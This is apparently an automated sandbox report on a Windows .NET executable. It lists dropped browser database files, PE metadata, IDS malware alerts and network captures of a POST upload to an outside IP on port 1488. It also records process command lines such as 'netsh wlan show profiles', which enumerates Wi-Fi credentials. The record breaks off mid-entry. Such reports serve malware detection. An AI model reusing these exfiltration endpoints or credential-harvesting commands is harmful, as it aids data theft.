                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):229376
                                    Entropy (8bit):0.9085960794285802
                                    Encrypted:false
                                    SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                    MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                    SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                    SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                    SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.7134786470484346
                                    Encrypted:false
                                    SSDEEP:24:TLvLbXYFpFNYbatqn1kweka6za6UwpQ9YH8fFSZ6HfB:T3LopFMatSaw/auUOIu8B
                                    MD5:04D4C386AAF03E6DCA3AC87334F03D3F
                                    SHA1:74627631CE3BD2BA43A12AAC39F232DA662A32C5
                                    SHA-256:C130CF082FDCE58C9055DBA5775490AD8E41055EAD5EDB0B1E411330144C971D
                                    SHA-512:01BCE1BBDF00825E19C23559EC41A0236B059CEC2E891CF4729288B6275AAFF62F442B4556C869BFBE17A91475F22DC98522381B2E4F3BEF6D1611F7F9F9BC1A
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................v..........g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 2, database pages 26, 1st free page 11, free pages 2, cookie 0x17, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):53248
                                    Entropy (8bit):0.7641640506938114
                                    Encrypted:false
                                    SSDEEP:96:ib3sCn8MouB6w9f/HeymwilREjFlKLAKYGcrhLwK:OcG7Iw9fFi/gKYGcrhL
                                    MD5:5084E2ACD4E60D6B8E38FB2D60BA3956
                                    SHA1:1E17662670FE28E04910F37C20C34DC8B306161E
                                    SHA-256:857520B4E72125DF0252466BF174A3B48737483E40557605E5CF6CB18351E7AC
                                    SHA-512:9E6A7ADA763C0DFF1FE35A549A3C3D80A056AA4BCB9DD87B292DF238F932CB734F21B2B70C3DEE72888CFEA6BF850FC685F50E936BB6DCB976113AE6B2CFBC0D
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 64, cookie 0x39, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):131072
                                    Entropy (8bit):1.1127005663943168
                                    Encrypted:false
                                    SSDEEP:192:gj9lMmoVZMPnSjMKzIuqd6FBzVuKEqmjS:2lMmo4PnSMKzIuC4zVuKEqmjS
                                    MD5:CF7B9812522729DAD97A5AFACD6A9FBC
                                    SHA1:39ABF6BCEB9EBF63E93731AAC3BF4D4E1B58D565
                                    SHA-256:DDDA048BC4D5729098B97ECA245D1E33DA344FAC2A0D65E1C28E1D1CEBE2838D
                                    SHA-512:9629E1567D49927051FA7CCA9D9BCF1D20C1C109C390ED34175423E3BA10EFD812674928E3B0875808A688397B9FC4E95A17FA0099D697B90A3A0169D73C0F39
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......@...........9......................................................v............<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 64, cookie 0x39, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):131072
                                    Entropy (8bit):1.1127005663943168
                                    Encrypted:false
                                    SSDEEP:192:gj9lMmoVZMPnSjMKzIuqd6FBzVuKEqmjS:2lMmo4PnSMKzIuC4zVuKEqmjS
                                    MD5:CF7B9812522729DAD97A5AFACD6A9FBC
                                    SHA1:39ABF6BCEB9EBF63E93731AAC3BF4D4E1B58D565
                                    SHA-256:DDDA048BC4D5729098B97ECA245D1E33DA344FAC2A0D65E1C28E1D1CEBE2838D
                                    SHA-512:9629E1567D49927051FA7CCA9D9BCF1D20C1C109C390ED34175423E3BA10EFD812674928E3B0875808A688397B9FC4E95A17FA0099D697B90A3A0169D73C0F39
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......@...........9......................................................v............<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 6, 1st free page 4, free pages 1, cookie 0x17, schema 4, UTF-8, version-valid-for 21
                                    Category:dropped
                                    Size (bytes):24576
                                    Entropy (8bit):1.7205820133739558
                                    Encrypted:false
                                    SSDEEP:96:faEeMaSdGQO5opAGKr0qUHEBXZt2rBMBMdD:faELa15opAGKrMoyNMBMV
                                    MD5:48231DD3AFDDF487468FDFC6001299DF
                                    SHA1:64F17D72CEEDA1ED11DD1181D3B104407512A6B5
                                    SHA-256:172C67EBB71EE55DD20FD406729FAAFDAF171ADBB8C3F55BE6F680599C302D47
                                    SHA-512:7506E8CB32EFF65BE6FD992E3D15B67B6252F4053E11A07FE0A41022C8E793F050374FFC44A5B8BB71838929E15B854F0E8037E03076AE638CCB4AB00F337C98
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................v..........g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 64, cookie 0x39, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):131072
                                    Entropy (8bit):1.1127005663943168
                                    Encrypted:false
                                    SSDEEP:192:gj9lMmoVZMPnSjMKzIuqd6FBzVuKEqmjS:2lMmo4PnSMKzIuC4zVuKEqmjS
                                    MD5:CF7B9812522729DAD97A5AFACD6A9FBC
                                    SHA1:39ABF6BCEB9EBF63E93731AAC3BF4D4E1B58D565
                                    SHA-256:DDDA048BC4D5729098B97ECA245D1E33DA344FAC2A0D65E1C28E1D1CEBE2838D
                                    SHA-512:9629E1567D49927051FA7CCA9D9BCF1D20C1C109C390ED34175423E3BA10EFD812674928E3B0875808A688397B9FC4E95A17FA0099D697B90A3A0169D73C0F39
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......@...........9......................................................v............<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):119241
                                    Entropy (8bit):6.098453314091889
                                    Encrypted:false
                                    SSDEEP:3072:223GVHzNGnV/WyzuGiy+G6nbKzJtmXIqVr+IsSq:L8zNsV3yGv56nb0tmDVbq
                                    MD5:9BCED9FCA72836469E1DA8AEAC72C2B5
                                    SHA1:744073076E7EE5BE875A00C71C10F44F2F518149
                                    SHA-256:D4E2AC6D1D53B90B16964293E0F531277D074DAFCBEA63F6A73CFC06F342738D
                                    SHA-512:E45F047AFE3A545DD2964F8EEA3EA8E3B941068166D5AA4FCC26530831B1A837364E337141DAF3FA6960A6450741D911D548120B9EBD596592D4984A30F3A52B
                                    Malicious:false
                                    Preview:{"accessibility":{"screen_ai":{"last_used_time":"13369745297249960"}},"autofill":{"ablation_seed":"KGnqFBTzt5U=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2024.7.12.235938"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13368724027528178"},"browser":{"default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","first_run_finished":true,"last_whats_new_version":128,"shortcut_migration_version":"116.0.5845.97","whats_new_hats_activation_threshold":94},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.726037050357588e+12,"network":1.726037051e+12,"ticks":257182580.0,"uncertainty":1805515.0}},"optimization_guide":{"model_cache_ke
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.720655268404406
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:T05Dk6G8fg.exe
                                    File size:821'248 bytes
                                    MD5:c0eecac6ebad33e8ec152dbcaf47f7d7
                                    SHA1:803a5e67b91856ca6b5ef732bbaf0b7b089f96e7
                                    SHA256:31dc0b83d8a5e8f366d31a111c8759d6bb736bc34bbff372db151b9df52b3b0f
                                    SHA512:e8987f24c8f8f1e8a085c7d87a869c64346b7a482c6c422cdf745b837636f27d9a461477dbc1ad9338b0e3aace6973e586339d16b10346faa381d6765bc56124
                                    SSDEEP:12288:rrIaweqnZJZf3BjinHqPXP1757PxRkUZ9iedZXJsKodrVa/fHadGNCJd:rrwe0ZJZf3x8KH1V7kUFPJsqPadZJd
                                    TLSH:E305F118ABFC9655E68C17B6E46B184DAAB1B9F5E113F35F3004B1F87EC37B08421896
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.T..........."...0.............6P... ........@.. ....................................`................................
                                    Icon Hash:90cececece8e8eb0
                                    Entrypoint:0x4b5036
                                    Entrypoint Section:.oqo
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0xF3548553 [Thu May 14 00:44:03 2099 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [004AC000h]
                                    dec ebp
                                    mov ecx, 051523C0h
                                    jmp 00007FD250FA1F93h
                                    xlatb
                                    push cx
                                    add eax, 419FDDEBh
                                    push eax
                                    add ax, 0000D96Bh
                                    out dx, eax
                                    sub al, 4Bh
                                    xchg eax, ebp
                                    sar dh, FFFFFFC9h
                                    add eax, C1A4D96Bh
                                    pop es
                                    inc eax
                                    in eax, D0h
                                    lds ebp, fword ptr [edx-22h]
                                    adc eax, EA0697A5h
                                    retf
                                    fsubp st(1), st(0)
                                    mov dword ptr [ebx+ebp*2+7Ch], 644186B9h
                                    adc al, cl
                                    push esp
                                    fadd qword ptr [edx-74h]
                                    outsb
                                    inc ebx
                                    mov ebx, AB4FFDE3h
                                    mov edx, 61FF97A0h
                                    shl byte ptr [esi+4A3D3A6Dh], cl
                                    mov edx, 1A2ECFDFh
                                    ret
                                    push FFFFFFD5h
                                    fxch7 st(7)
                                    cld
                                    add dl, ch
                                    sal byte ptr [ebp+6B42AC82h], 00000077h
                                    sub al, E3h
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1330100x28.oqo
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1760000x150c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1780000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xac0000x8.{oA
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x14d5800x48.oqo
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x296500x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .qyy0x2c0000x7e2870x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .{oA0xac0000x80x2009269ea593f0af51825ebac1ca6342663False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .oqo0xae0000xc69dc0xc6a0092e08009fe9d1b33c2dc34b479024306False0.8518513510855884data7.732257971934118IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x1760000x150c0x160014bf341398626ef95aed2b18a5c16519False0.3913352272727273data5.41512166890206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1780000xc0x20063a3ec8a69c8f5bdcc02bbb588b4405dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0x1760900x340data0.45072115384615385
                                    RT_MANIFEST0x1763e00x1126XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.40387243735763095
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-04T15:07:30.653743+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304938123.50.114.44443TCP
                                    2024-12-04T15:07:37.645453+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.11.304938289.23.100.2331488TCP
                                    2024-12-04T15:08:34.171333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304938723.50.114.44443TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 4, 2024 15:07:30.344158888 CET4938080192.168.11.30104.16.184.241
                                    Dec 4, 2024 15:07:30.470380068 CET8049380104.16.184.241192.168.11.30
                                    Dec 4, 2024 15:07:30.470707893 CET4938080192.168.11.30104.16.184.241
                                    Dec 4, 2024 15:07:30.474982977 CET4938080192.168.11.30104.16.184.241
                                    Dec 4, 2024 15:07:30.601161957 CET8049380104.16.184.241192.168.11.30
                                    Dec 4, 2024 15:07:30.611010075 CET8049380104.16.184.241192.168.11.30
                                    Dec 4, 2024 15:07:30.661786079 CET4938080192.168.11.30104.16.184.241
                                    Dec 4, 2024 15:07:36.578846931 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:36.840722084 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:36.840970039 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:36.842866898 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:36.844675064 CET4938080192.168.11.30104.16.184.241
                                    Dec 4, 2024 15:07:36.971210003 CET8049380104.16.184.241192.168.11.30
                                    Dec 4, 2024 15:07:36.971379042 CET4938080192.168.11.30104.16.184.241
                                    Dec 4, 2024 15:07:37.114572048 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.120188951 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.120829105 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.121004105 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.381853104 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382534027 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382543087 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382808924 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.382858038 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.382858992 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382868052 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382874012 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382905960 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.382905960 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.383191109 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.383199930 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.383248091 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.383585930 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.383745909 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.644573927 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.644584894 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.644834042 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.645032883 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.645106077 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.645258904 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.645334959 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.645431995 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.645438910 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.645452976 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.645642996 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.645812988 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.646152973 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.907196999 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.907398939 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.907448053 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.907463074 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.907680035 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.907733917 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.907743931 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.907850981 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.908005953 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.908015013 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.908179998 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.908198118 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.908344984 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:37.910304070 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.910317898 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:37.910635948 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.169486046 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.169584036 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.169594049 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.169794083 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.169805050 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170026064 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170036077 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170216084 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170465946 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170474052 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170768023 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170774937 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.170886993 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.171145916 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:38.171155930 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:39.692516088 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:39.703986883 CET14884938289.23.100.233192.168.11.30
                                    Dec 4, 2024 15:07:39.704191923 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:39.708229065 CET493821488192.168.11.3089.23.100.233
                                    Dec 4, 2024 15:07:39.969919920 CET14884938289.23.100.233192.168.11.30
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 4, 2024 15:07:30.201396942 CET6465053192.168.11.301.1.1.1
                                    Dec 4, 2024 15:07:30.328739882 CET53646501.1.1.1192.168.11.30
                                    Dec 4, 2024 15:07:30.632322073 CET5622653192.168.11.301.1.1.1
                                    Dec 4, 2024 15:07:30.759540081 CET53562261.1.1.1192.168.11.30
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 4, 2024 15:07:30.201396942 CET192.168.11.301.1.1.10x7bStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                    Dec 4, 2024 15:07:30.632322073 CET192.168.11.301.1.1.10xe829Standard query (0)15.55.7.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 4, 2024 15:07:30.328739882 CET1.1.1.1192.168.11.300x7bNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                    Dec 4, 2024 15:07:30.328739882 CET1.1.1.1192.168.11.300x7bNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                    Dec 4, 2024 15:07:30.759540081 CET1.1.1.1192.168.11.300xe829Name error (3)15.55.7.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                    • icanhazip.com
                                    • 89.23.100.233:1488
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.11.3049380104.16.184.241802956C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 4, 2024 15:07:30.474982977 CET63OUTGET / HTTP/1.1
                                    Host: icanhazip.com
                                    Connection: Keep-Alive
                                    Dec 4, 2024 15:07:30.611010075 CET535INHTTP/1.1 200 OK
                                    Date: Wed, 04 Dec 2024 14:07:30 GMT
                                    Content-Type: text/plain
                                    Content-Length: 13
                                    Connection: keep-alive
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET
                                    Set-Cookie: __cf_bm=LAQ7Vy1WJB6hzbGVtiR0390IiophIvZqpaqTqIeWFSI-1733321250-1.0.1.1-4eiSeK58pUcJP0QTY6y6sttZ4EthyVC3txeJUDVjhUclOPX_KPU70IQVPkhqNkDzqNPLhRMn2fuirSG3nlqYWg; path=/; expires=Wed, 04-Dec-24 14:37:30 GMT; domain=.icanhazip.com; HttpOnly
                                    Server: cloudflare
                                    CF-RAY: 8ecc5cf7d90c228a-MIA
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a
                                    Data Ascii: 84.17.40.110


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.11.304938289.23.100.23314882956C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 4, 2024 15:07:36.842866898 CET205OUTPOST /upload HTTP/1.1
                                    Content-Type: multipart/form-data; boundary="65402622-80d8-4158-9f0b-d6844d3bfea0"
                                    Host: 89.23.100.233:1488
                                    Content-Length: 135206
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Dec 4, 2024 15:07:37.114572048 CET25INHTTP/1.1 100 Continue
                                    Dec 4, 2024 15:07:37.381853104 CET25INHTTP/1.1 100 Continue
                                    Dec 4, 2024 15:07:39.692516088 CET165INHTTP/1.1 200 OK
                                    Server: Werkzeug/3.1.3 Python/3.13.0
                                    Date: Wed, 04 Dec 2024 14:07:39 GMT
                                    Content-Type: application/json
                                    Content-Length: 61
                                    Connection: close


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:1
                                    Start time:09:07:26
                                    Start date:04/12/2024
                                    Path:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\T05Dk6G8fg.exe"
                                    Imagebase:0x860000
                                    File size:821'248 bytes
                                    MD5 hash:C0EECAC6EBAD33E8EC152DBCAF47F7D7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:09:07:28
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"cmd.exe" /c tasklist
                                    Imagebase:0xaa0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:09:07:28
                                    Start date:04/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff614b20000
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:09:07:28
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x830000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:09:07:28
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                    Imagebase:0xaa0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:09:07:28
                                    Start date:04/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff614b20000
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:09:07:29
